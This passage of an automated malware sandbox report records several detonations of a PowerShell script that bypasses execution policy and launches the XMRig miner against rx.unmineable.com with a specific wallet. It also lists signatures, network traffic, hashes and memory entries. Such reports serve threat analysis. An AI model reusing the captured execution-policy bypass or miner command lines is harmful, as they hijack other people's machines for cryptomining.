memory/2192-150-0x00007FF617B70000-0x00007FF6187A3000-memory.dmp
memory/2192-151-0x00007FF617B70000-0x00007FF6187A3000-memory.dmp
memory/2192-152-0x00007FF617B70000-0x00007FF6187A3000-memory.dmp
memory/2192-153-0x00007FF617B70000-0x00007FF6187A3000-memory.dmp
memory/2192-154-0x00007FF617B70000-0x00007FF6187A3000-memory.dmp
memory/2192-155-0x00007FF617B70000-0x00007FF6187A3000-memory.dmp
Analysis: behavioral11
Detonation Overview
Submitted
2024-05-27 00:27
Reported
2024-05-27 01:24
Platform
win10v2004-20240508-en
Max time kernel
1791s
Max time network
1779s
Command Line
Signatures
XMRig Miner payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
xmrig
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 3052 wrote to memory of 5016 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
| PID 3052 wrote to memory of 5016 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
Processes
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (4).ps1"
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | 196.249.167.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 91.90.14.23.in-addr.arpa | udp |
| US | 8.8.8.8:53 | objects.githubusercontent.com | udp |
| US | 185.199.108.133:443 | objects.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | 215.156.26.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 133.108.199.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 22.160.190.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | g.bing.com | udp |
| US | 204.79.197.237:443 | g.bing.com | tcp |
| NL | 23.62.61.194:443 | www.bing.com | tcp |
| US | 8.8.8.8:53 | 237.197.79.204.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 194.61.62.23.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 232.168.11.51.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 43.58.199.20.in-addr.arpa | udp |
| NL | 23.62.61.194:443 | www.bing.com | tcp |
| US | 8.8.8.8:53 | rx.unmineable.com | udp |
| GB | 161.35.34.195:443 | rx.unmineable.com | tcp |
| US | 8.8.8.8:53 | 183.142.211.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 195.34.35.161.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 154.239.44.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 86.23.85.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 171.39.242.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 240.221.184.93.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 23.236.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 3.173.189.20.in-addr.arpa | udp |
Files
memory/3052-0-0x00007FFE7B8E3000-0x00007FFE7B8E5000-memory.dmp
memory/3052-1-0x000002A939550000-0x000002A939572000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_xwaudfzl.onm.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/3052-11-0x00007FFE7B8E0000-0x00007FFE7C3A1000-memory.dmp
memory/3052-12-0x00007FFE7B8E0000-0x00007FFE7C3A1000-memory.dmp
memory/3052-14-0x00007FFE7B8E0000-0x00007FFE7C3A1000-memory.dmp
memory/3052-15-0x000002A93A410000-0x000002A93A422000-memory.dmp
memory/3052-16-0x000002A939600000-0x000002A93960A000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
| MD5 | 205ad9eb6acd6f58752899669b69fe74 |
| SHA1 | bedb78ac5034259b86c2cbc915de2e861e8d7604 |
| SHA256 | 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda |
| SHA512 | 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3 |
memory/5016-47-0x000001CC84890000-0x000001CC848B0000-memory.dmp
memory/5016-48-0x000001CC86190000-0x000001CC861B0000-memory.dmp
memory/5016-49-0x00007FF76D0A0000-0x00007FF76DCD3000-memory.dmp
memory/5016-51-0x000001CC861B0000-0x000001CC861D0000-memory.dmp
memory/5016-50-0x000001CC861D0000-0x000001CC861F0000-memory.dmp
memory/3052-53-0x00007FFE7B8E3000-0x00007FFE7B8E5000-memory.dmp
memory/5016-52-0x00007FF76D0A0000-0x00007FF76DCD3000-memory.dmp
memory/3052-54-0x00007FFE7B8E0000-0x00007FFE7C3A1000-memory.dmp
memory/5016-55-0x00007FF76D0A0000-0x00007FF76DCD3000-memory.dmp
memory/5016-56-0x00007FF76D0A0000-0x00007FF76DCD3000-memory.dmp
memory/5016-57-0x000001CC861D0000-0x000001CC861F0000-memory.dmp
memory/5016-58-0x000001CC861B0000-0x000001CC861D0000-memory.dmp
memory/5016-59-0x00007FF76D0A0000-0x00007FF76DCD3000-memory.dmp
memory/5016-60-0x00007FF76D0A0000-0x00007FF76DCD3000-memory.dmp
memory/5016-61-0x00007FF76D0A0000-0x00007FF76DCD3000-memory.dmp
memory/5016-62-0x00007FF76D0A0000-0x00007FF76DCD3000-memory.dmp
memory/5016-63-0x00007FF76D0A0000-0x00007FF76DCD3000-memory.dmp
memory/5016-64-0x00007FF76D0A0000-0x00007FF76DCD3000-memory.dmp
memory/5016-65-0x00007FF76D0A0000-0x00007FF76DCD3000-memory.dmp
memory/5016-66-0x00007FF76D0A0000-0x00007FF76DCD3000-memory.dmp
memory/5016-67-0x00007FF76D0A0000-0x00007FF76DCD3000-memory.dmp
memory/5016-68-0x00007FF76D0A0000-0x00007FF76DCD3000-memory.dmp
memory/5016-69-0x00007FF76D0A0000-0x00007FF76DCD3000-memory.dmp
memory/5016-70-0x00007FF76D0A0000-0x00007FF76DCD3000-memory.dmp
memory/5016-71-0x00007FF76D0A0000-0x00007FF76DCD3000-memory.dmp
memory/5016-72-0x00007FF76D0A0000-0x00007FF76DCD3000-memory.dmp
memory/5016-73-0x00007FF76D0A0000-0x00007FF76DCD3000-memory.dmp
memory/5016-74-0x00007FF76D0A0000-0x00007FF76DCD3000-memory.dmp
memory/5016-75-0x00007FF76D0A0000-0x00007FF76DCD3000-memory.dmp
memory/5016-76-0x00007FF76D0A0000-0x00007FF76DCD3000-memory.dmp
memory/5016-77-0x00007FF76D0A0000-0x00007FF76DCD3000-memory.dmp
memory/5016-78-0x00007FF76D0A0000-0x00007FF76DCD3000-memory.dmp
memory/5016-79-0x00007FF76D0A0000-0x00007FF76DCD3000-memory.dmp
memory/5016-80-0x00007FF76D0A0000-0x00007FF76DCD3000-memory.dmp
memory/5016-81-0x00007FF76D0A0000-0x00007FF76DCD3000-memory.dmp
memory/5016-82-0x00007FF76D0A0000-0x00007FF76DCD3000-memory.dmp
memory/5016-83-0x00007FF76D0A0000-0x00007FF76DCD3000-memory.dmp
memory/5016-84-0x00007FF76D0A0000-0x00007FF76DCD3000-memory.dmp
memory/5016-85-0x00007FF76D0A0000-0x00007FF76DCD3000-memory.dmp
memory/5016-86-0x00007FF76D0A0000-0x00007FF76DCD3000-memory.dmp
memory/5016-87-0x00007FF76D0A0000-0x00007FF76DCD3000-memory.dmp
memory/5016-88-0x00007FF76D0A0000-0x00007FF76DCD3000-memory.dmp
memory/5016-89-0x00007FF76D0A0000-0x00007FF76DCD3000-memory.dmp
memory/5016-90-0x00007FF76D0A0000-0x00007FF76DCD3000-memory.dmp
memory/5016-91-0x00007FF76D0A0000-0x00007FF76DCD3000-memory.dmp
memory/5016-92-0x00007FF76D0A0000-0x00007FF76DCD3000-memory.dmp
memory/5016-93-0x00007FF76D0A0000-0x00007FF76DCD3000-memory.dmp
memory/5016-94-0x00007FF76D0A0000-0x00007FF76DCD3000-memory.dmp
memory/5016-95-0x00007FF76D0A0000-0x00007FF76DCD3000-memory.dmp
memory/5016-96-0x00007FF76D0A0000-0x00007FF76DCD3000-memory.dmp
memory/5016-97-0x00007FF76D0A0000-0x00007FF76DCD3000-memory.dmp
memory/5016-98-0x00007FF76D0A0000-0x00007FF76DCD3000-memory.dmp
memory/5016-99-0x00007FF76D0A0000-0x00007FF76DCD3000-memory.dmp
memory/5016-100-0x00007FF76D0A0000-0x00007FF76DCD3000-memory.dmp
memory/5016-101-0x00007FF76D0A0000-0x00007FF76DCD3000-memory.dmp
memory/5016-102-0x00007FF76D0A0000-0x00007FF76DCD3000-memory.dmp
memory/5016-103-0x00007FF76D0A0000-0x00007FF76DCD3000-memory.dmp
memory/5016-104-0x00007FF76D0A0000-0x00007FF76DCD3000-memory.dmp
memory/5016-105-0x00007FF76D0A0000-0x00007FF76DCD3000-memory.dmp
memory/5016-106-0x00007FF76D0A0000-0x00007FF76DCD3000-memory.dmp
memory/5016-107-0x00007FF76D0A0000-0x00007FF76DCD3000-memory.dmp
memory/5016-108-0x00007FF76D0A0000-0x00007FF76DCD3000-memory.dmp
memory/5016-109-0x00007FF76D0A0000-0x00007FF76DCD3000-memory.dmp
memory/5016-110-0x00007FF76D0A0000-0x00007FF76DCD3000-memory.dmp
memory/5016-111-0x00007FF76D0A0000-0x00007FF76DCD3000-memory.dmp
memory/5016-112-0x00007FF76D0A0000-0x00007FF76DCD3000-memory.dmp
memory/5016-113-0x00007FF76D0A0000-0x00007FF76DCD3000-memory.dmp
memory/5016-114-0x00007FF76D0A0000-0x00007FF76DCD3000-memory.dmp
memory/5016-115-0x00007FF76D0A0000-0x00007FF76DCD3000-memory.dmp
memory/5016-116-0x00007FF76D0A0000-0x00007FF76DCD3000-memory.dmp
memory/5016-117-0x00007FF76D0A0000-0x00007FF76DCD3000-memory.dmp
Analysis: behavioral15
Detonation Overview
Submitted
2024-05-27 00:27
Reported
2024-05-27 01:26
Platform
win10v2004-20240426-en
Max time kernel
1800s
Max time network
1781s
Command Line
Signatures
XMRig Miner payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
xmrig
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 3572 wrote to memory of 796 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
| PID 3572 wrote to memory of 796 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
Processes
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (5).ps1"
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | objects.githubusercontent.com | udp |
| US | 185.199.108.133:443 | objects.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | 58.55.71.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 215.156.26.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 133.108.199.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 91.90.14.23.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 20.160.190.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | rx.unmineable.com | udp |
| GB | 161.35.34.195:443 | rx.unmineable.com | tcp |
| US | 8.8.8.8:53 | 195.34.35.161.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 13.86.106.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 209.205.72.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 50.23.12.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 198.187.3.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 77.190.18.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 14.227.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 82.90.14.23.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 170.253.116.51.in-addr.arpa | udp |
Files
memory/3572-0-0x00007FFD98823000-0x00007FFD98825000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_fwp5425k.lif.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/3572-10-0x000001AE2B450000-0x000001AE2B472000-memory.dmp
memory/3572-11-0x00007FFD98820000-0x00007FFD992E1000-memory.dmp
memory/3572-12-0x00007FFD98820000-0x00007FFD992E1000-memory.dmp
memory/3572-14-0x00007FFD98820000-0x00007FFD992E1000-memory.dmp
memory/3572-15-0x000001AE2B4C0000-0x000001AE2B4D2000-memory.dmp
memory/3572-16-0x000001AE2B150000-0x000001AE2B15A000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
| MD5 | 205ad9eb6acd6f58752899669b69fe74 |
| SHA1 | bedb78ac5034259b86c2cbc915de2e861e8d7604 |
| SHA256 | 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda |
| SHA512 | 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3 |
memory/796-47-0x000001EB9E520000-0x000001EB9E540000-memory.dmp
memory/796-48-0x000001EB9E560000-0x000001EB9E580000-memory.dmp
memory/796-49-0x00007FF64D070000-0x00007FF64DCA3000-memory.dmp
memory/796-50-0x000001EB9E580000-0x000001EB9E5A0000-memory.dmp
memory/796-51-0x000001EB9E5A0000-0x000001EB9E5C0000-memory.dmp
memory/3572-53-0x00007FFD98823000-0x00007FFD98825000-memory.dmp
memory/796-52-0x00007FF64D070000-0x00007FF64DCA3000-memory.dmp
memory/3572-54-0x00007FFD98820000-0x00007FFD992E1000-memory.dmp
memory/3572-56-0x00007FFD98820000-0x00007FFD992E1000-memory.dmp
memory/796-55-0x00007FF64D070000-0x00007FF64DCA3000-memory.dmp
memory/796-58-0x000001EB9E580000-0x000001EB9E5A0000-memory.dmp
memory/796-57-0x00007FF64D070000-0x00007FF64DCA3000-memory.dmp
memory/796-59-0x000001EB9E5A0000-0x000001EB9E5C0000-memory.dmp
memory/796-60-0x00007FF64D070000-0x00007FF64DCA3000-memory.dmp
memory/796-61-0x00007FF64D070000-0x00007FF64DCA3000-memory.dmp
memory/796-62-0x00007FF64D070000-0x00007FF64DCA3000-memory.dmp
memory/796-63-0x00007FF64D070000-0x00007FF64DCA3000-memory.dmp
memory/796-64-0x00007FF64D070000-0x00007FF64DCA3000-memory.dmp
memory/796-65-0x00007FF64D070000-0x00007FF64DCA3000-memory.dmp
memory/796-66-0x00007FF64D070000-0x00007FF64DCA3000-memory.dmp
memory/796-67-0x00007FF64D070000-0x00007FF64DCA3000-memory.dmp
memory/796-68-0x00007FF64D070000-0x00007FF64DCA3000-memory.dmp
memory/796-69-0x00007FF64D070000-0x00007FF64DCA3000-memory.dmp
memory/796-70-0x00007FF64D070000-0x00007FF64DCA3000-memory.dmp
memory/796-71-0x00007FF64D070000-0x00007FF64DCA3000-memory.dmp
memory/796-72-0x00007FF64D070000-0x00007FF64DCA3000-memory.dmp
memory/796-73-0x00007FF64D070000-0x00007FF64DCA3000-memory.dmp
memory/796-74-0x00007FF64D070000-0x00007FF64DCA3000-memory.dmp
memory/796-75-0x00007FF64D070000-0x00007FF64DCA3000-memory.dmp
memory/796-76-0x00007FF64D070000-0x00007FF64DCA3000-memory.dmp
memory/796-77-0x00007FF64D070000-0x00007FF64DCA3000-memory.dmp
memory/796-78-0x00007FF64D070000-0x00007FF64DCA3000-memory.dmp
memory/796-79-0x00007FF64D070000-0x00007FF64DCA3000-memory.dmp
memory/796-80-0x00007FF64D070000-0x00007FF64DCA3000-memory.dmp
memory/796-81-0x00007FF64D070000-0x00007FF64DCA3000-memory.dmp
memory/796-82-0x00007FF64D070000-0x00007FF64DCA3000-memory.dmp
memory/796-83-0x00007FF64D070000-0x00007FF64DCA3000-memory.dmp
memory/796-84-0x00007FF64D070000-0x00007FF64DCA3000-memory.dmp
memory/796-85-0x00007FF64D070000-0x00007FF64DCA3000-memory.dmp
memory/796-86-0x00007FF64D070000-0x00007FF64DCA3000-memory.dmp
memory/796-87-0x00007FF64D070000-0x00007FF64DCA3000-memory.dmp
memory/796-88-0x00007FF64D070000-0x00007FF64DCA3000-memory.dmp
memory/796-89-0x00007FF64D070000-0x00007FF64DCA3000-memory.dmp
memory/796-90-0x00007FF64D070000-0x00007FF64DCA3000-memory.dmp
memory/796-91-0x00007FF64D070000-0x00007FF64DCA3000-memory.dmp
memory/796-92-0x00007FF64D070000-0x00007FF64DCA3000-memory.dmp
memory/796-93-0x00007FF64D070000-0x00007FF64DCA3000-memory.dmp
memory/796-94-0x00007FF64D070000-0x00007FF64DCA3000-memory.dmp
memory/796-95-0x00007FF64D070000-0x00007FF64DCA3000-memory.dmp
memory/796-96-0x00007FF64D070000-0x00007FF64DCA3000-memory.dmp
memory/796-97-0x00007FF64D070000-0x00007FF64DCA3000-memory.dmp
memory/796-98-0x00007FF64D070000-0x00007FF64DCA3000-memory.dmp
memory/796-99-0x00007FF64D070000-0x00007FF64DCA3000-memory.dmp
memory/796-100-0x00007FF64D070000-0x00007FF64DCA3000-memory.dmp
memory/796-101-0x00007FF64D070000-0x00007FF64DCA3000-memory.dmp
memory/796-102-0x00007FF64D070000-0x00007FF64DCA3000-memory.dmp
memory/796-103-0x00007FF64D070000-0x00007FF64DCA3000-memory.dmp
memory/796-104-0x00007FF64D070000-0x00007FF64DCA3000-memory.dmp
memory/796-105-0x00007FF64D070000-0x00007FF64DCA3000-memory.dmp
memory/796-106-0x00007FF64D070000-0x00007FF64DCA3000-memory.dmp
memory/796-107-0x00007FF64D070000-0x00007FF64DCA3000-memory.dmp
memory/796-108-0x00007FF64D070000-0x00007FF64DCA3000-memory.dmp
memory/796-109-0x00007FF64D070000-0x00007FF64DCA3000-memory.dmp
memory/796-110-0x00007FF64D070000-0x00007FF64DCA3000-memory.dmp
memory/796-111-0x00007FF64D070000-0x00007FF64DCA3000-memory.dmp
memory/796-112-0x00007FF64D070000-0x00007FF64DCA3000-memory.dmp
memory/796-113-0x00007FF64D070000-0x00007FF64DCA3000-memory.dmp
memory/796-114-0x00007FF64D070000-0x00007FF64DCA3000-memory.dmp
memory/796-115-0x00007FF64D070000-0x00007FF64DCA3000-memory.dmp
memory/796-116-0x00007FF64D070000-0x00007FF64DCA3000-memory.dmp
memory/796-117-0x00007FF64D070000-0x00007FF64DCA3000-memory.dmp
memory/796-118-0x00007FF64D070000-0x00007FF64DCA3000-memory.dmp
Analysis: behavioral13
Detonation Overview
Submitted
2024-05-27 00:27
Reported
2024-05-27 01:25
Platform
win7-20240221-en
Max time kernel
1563s
Max time network
1564s
Command Line
Signatures
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Processes
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (5).ps1"
Network
Files
memory/2752-4-0x000007FEF5A1E000-0x000007FEF5A1F000-memory.dmp
memory/2752-5-0x000000001B720000-0x000000001BA02000-memory.dmp
memory/2752-8-0x000007FEF5760000-0x000007FEF60FD000-memory.dmp
memory/2752-7-0x000007FEF5760000-0x000007FEF60FD000-memory.dmp
memory/2752-6-0x0000000001DF0000-0x0000000001DF8000-memory.dmp
memory/2752-9-0x000007FEF5760000-0x000007FEF60FD000-memory.dmp
memory/2752-10-0x000007FEF5760000-0x000007FEF60FD000-memory.dmp
memory/2752-11-0x000007FEF5760000-0x000007FEF60FD000-memory.dmp
memory/2752-12-0x000007FEF5760000-0x000007FEF60FD000-memory.dmp
Analysis: behavioral14
Detonation Overview
Submitted
